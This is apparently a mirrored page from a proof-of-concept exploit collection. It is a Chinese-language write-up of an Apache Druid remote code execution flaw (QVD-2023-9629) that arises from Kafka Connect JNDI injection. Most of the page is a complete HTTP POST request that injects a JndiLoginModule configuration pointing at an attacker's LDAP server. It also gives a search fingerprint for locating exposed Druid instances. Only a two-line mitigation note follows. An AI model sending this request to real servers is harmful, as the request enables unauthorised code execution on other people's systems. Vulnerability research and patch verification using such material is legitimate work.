admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/数据库漏洞/Apache Druid 远程代码执行漏洞 QVD-2023-9629.md

94 lines
2.6 KiB
Markdown
Raw Normal View History

update
2024-11-06 14:10:36 +08:00
# Apache Druid 远程代码执行漏洞 QVD-2023-9629
## 漏洞描述
该漏洞源于 Apache Kafka Connect JNDI 注入漏洞CVE-2023-25194Apache Druid 由于支持从 Kafka 加载数据刚好满足其利用条件攻击者可通过修改Kafka 连接配置属性进行 JNDI 注入攻击,进而在服务端执行任意恶意代码。
## 漏洞影响
```
Apache Druid <= 25.0.0
```
## 网络测绘
```
title="Apache Druid"
```
## 漏洞复现
访问漏洞环境,点击 Load data -> Streaming进入页面后点击 Apache Kafka -> Connect data
![image-20230801093324881](images/image-20230801093324881.png)
在 Bootstrap servers 和 Topic 处填入任意字符,点击 Apply抓包。
poc
```
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 1437
Connection: close
{
"type":"kafka",
"spec":{
"type":"kafka",
"ioConfig":{
"type":"kafka",
"consumerProperties":{
"bootstrap.servers":"1.1.1.1:9092",
"sasl.mechanism":"SCRAM-SHA-256",
"security.protocol":"SASL_SSL",
"sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://your-ip\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
},
"topic":"any",
"useEarliestOffset":true,
"inputFormat":{
"type":"regex",
"pattern":"([\\s\\S]*)",
"listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
"columns":[
"raw"
]
}
},
"dataSchema":{
"dataSource":"sample",
"timestampSpec":{
"column":"!!!_no_such_column_!!!",
"missingValue":"1970-01-01T00:00:00Z"
},
"dimensionsSpec":{
},
"granularitySpec":{
"rollup":false
}
},
"tuningConfig":{
"type":"kafka"
}
},
"samplerConfig":{
"numRows":500,
"timeoutMs":15000
}
}
```
修改请求包user.provider.url 处填写你的 ldap 服务 url。
利用 DNSLog 验证漏洞是否存在。
## 修复建议
- 避免 Apache Druid 开放至公网。
- 开启身份认证机制,可参考官方文档https://druid.apache.org/docs/latest/development/extensions-core/druid-basic-security.html
Reference in New Issue Copy Permalink